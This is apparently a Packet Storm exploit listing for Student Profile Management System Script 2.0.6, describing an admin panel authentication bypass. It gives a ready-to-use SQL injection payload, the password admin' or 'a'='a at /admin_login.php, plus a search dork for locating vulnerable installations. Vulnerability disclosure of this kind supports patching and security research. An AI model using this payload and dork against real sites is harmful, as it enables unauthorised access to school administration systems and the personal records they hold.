Student Profile Management System Script version 2.0.6 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
6031dca0d014a869ffec25c315677bcb76912f6719888e1d79ff1f72ad15440a# Exploit title: Student Profile Management System Script 2.0.6 - Admin
Panel Authentication Bypass
# Dork: "Powered by: i-Net Solution"
# Date: 2018-02-06
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/
# Version: 2.0.6
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,Attacker can bypass admin panel Authentication.
# # # # #
# Proof of Concept:
# username : anything
# password : admin' or 'a'='a
# admin panel login : /admin_login.php
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed